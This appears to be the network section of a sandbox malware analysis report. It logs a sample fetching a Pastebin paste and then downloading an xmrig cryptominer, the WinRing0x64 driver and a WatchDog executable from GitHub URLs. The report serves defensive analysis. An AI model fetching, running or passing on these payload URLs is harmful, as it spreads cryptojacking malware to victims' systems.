Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| raw.githubusercontent.com | 185.199.108.133 | |
| pastebin.com | 104.20.68.143 | |
| github.com | 20.200.245.247 |
- TCP Requests
GET
200
https://pastebin.com/raw/bWjH1xU4
REQUEST
RESPONSE
BODY
GET /raw/bWjH1xU4 HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 20 Jun 2023 20:34:07 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: MISS
Last-Modified: Tue, 20 Jun 2023 20:34:07 GMT
Server: cloudflare
CF-RAY: 7da6ca5e3e768361-KIX
GET
302
https://github.com/SilentHash/xmrig/raw/main/xmrig.exe
REQUEST
RESPONSE
BODY
GET /SilentHash/xmrig/raw/main/xmrig.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: GitHub.com
Date: Tue, 20 Jun 2023 20:34:07 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/SilentHash/xmrig/main/xmrig.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ wss://*.actions.githubusercontent.com github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C020:7051:243274:2BEE76:64920D3F
GET
302
https://github.com/SilentHash/WinRing/raw/main/WinRing0x64.sys
REQUEST
RESPONSE
BODY
GET /SilentHash/WinRing/raw/main/WinRing0x64.sys HTTP/1.1
Host: github.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: GitHub.com
Date: Tue, 20 Jun 2023 20:34:07 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/SilentHash/WinRing/main/WinRing0x64.sys
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ wss://*.actions.githubusercontent.com github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C021:79B5:242F0A:2BEABF:64920D3F
GET
200
https://raw.githubusercontent.com/SilentHash/WinRing/main/WinRing0x64.sys
REQUEST
RESPONSE
BODY
GET /SilentHash/WinRing/main/WinRing0x64.sys HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 14544
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "eb6132670d71c0f0a0135281e09093ea8d3b37b755ef8f0c099eb8d539a74073"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 2E7E:7F1C:20BB1:3DBC7:64920D3D
Accept-Ranges: bytes
Date: Tue, 20 Jun 2023 20:34:08 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450097-ICN
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1687293248.921005,VS0,VE301
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: da877ecd0ae75d2f1928a45fc534b1888ff105e3
Expires: Tue, 20 Jun 2023 20:39:08 GMT
Source-Age: 0
GET
302
https://github.com/SilentHash/watchdog/raw/main/WatchDog.exe
REQUEST
RESPONSE
BODY
GET /SilentHash/watchdog/raw/main/WatchDog.exe HTTP/1.1
Host: github.com
HTTP/1.1 302 Found
Server: GitHub.com
Date: Tue, 20 Jun 2023 20:34:08 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/SilentHash/watchdog/main/WatchDog.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ wss://*.actions.githubusercontent.com github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C020:7051:24327B:2BEE84:64920D3F
GET
200
https://raw.githubusercontent.com/SilentHash/xmrig/main/xmrig.exe
REQUEST
RESPONSE
BODY
GET /SilentHash/xmrig/main/xmrig.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 8233984
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "1a4884c17b83e0a59bb8c01f46b8db7ecaf3ca76e0416d22df78df769e0ad79e"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 4404:6177:19032:3603C:64920D3F
Accept-Ranges: bytes
Date: Tue, 20 Jun 2023 20:34:08 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450049-ICN
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1687293248.015113,VS0,VE756
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 7e8214cf2c5d8f4455c9c9fe7808071e3f355464
Expires: Tue, 20 Jun 2023 20:39:08 GMT
Source-Age: 0
GET
200
https://raw.githubusercontent.com/SilentHash/watchdog/main/WatchDog.exe
REQUEST
RESPONSE
BODY
GET /SilentHash/watchdog/main/WatchDog.exe HTTP/1.1
Host: raw.githubusercontent.com
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 63488
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "d11a11fde6209723f6cb5aafa663f9ce98de4e368c77d4ec1e63121ef50225ae"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 36AC:05B7:1C086:39095:64920D38
Accept-Ranges: bytes
Date: Tue, 20 Jun 2023 20:34:08 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450097-ICN
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1687293248.244992,VS0,VE272
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 493c9027901b976129de1a4a8388d88c1c878352
Expires: Tue, 20 Jun 2023 20:39:08 GMT
Source-Age: 0
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.103:49193 185.199.109.133:443 |
None | None | None |
|
TLS 1.2 192.168.56.103:49185 20.200.245.247:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com | a3:b5:9e:5f:e8:84:ee:1f:34:d9:8e:ef:85:8e:3f:b6:62:ac:10:4a |
|
TLS 1.2 192.168.56.103:49179 172.67.34.170:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f |
|
TLS 1.2 192.168.56.103:49191 185.199.109.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | a1:46:14:c7:2a:1d:52:79:f6:aa:2b:b2:c5:0a:3b:d3:f5:02:06:75 |
|
TLS 1.2 192.168.56.103:49184 20.200.245.247:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com | a3:b5:9e:5f:e8:84:ee:1f:34:d9:8e:ef:85:8e:3f:b6:62:ac:10:4a |
Snort Alerts
No Snort Alerts